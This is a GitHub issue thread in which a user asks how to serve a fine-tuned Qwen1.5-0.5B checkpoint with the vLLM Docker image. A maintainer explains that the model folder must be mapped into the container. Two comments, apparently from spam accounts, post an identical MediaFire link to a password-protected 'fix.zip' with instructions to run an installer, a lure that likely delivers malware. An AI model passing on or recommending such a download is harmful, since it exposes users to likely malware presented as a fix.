### ISSUE TITLE
[Usage]: deploy qwen1.5-0.5B using docker

### ISSUE THREAD

**Issue by AlbertBJ** [vllm-project/vllm#7867]
### Your current environment

```text
The output of `python collect_env.py`
```

### How would you like to use vllm

docker run --runtime nvidia --gpus all \
    -p 8002:8002 \
    --ipc=host \
    --name vllm_ch_test \
    vllm/vllm-openai:latest \
    --model ./checkpoint-300

checkpoint-300 folder:
<img width="1045" alt="image" src="https://github.com/user-attachments/assets/f8862d9a-3699-4890-b984-7033dd4a32aa">

error:
<img width="1038" alt="image" src="https://github.com/user-attachments/assets/1cfc593c-9e96-4bd9-8769-64a74cc02b2a">

the checkpoint_300 folder is generated using ms-swift finetune 

### Before submitting a new issue...

- [X] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by youkaichao** [comment]
check https://docs.vllm.ai/en/latest/serving/deploying_with_docker.html , you need to map the filepath into docker.

**Comment by AlbertBJ** [comment]
ok, thanks
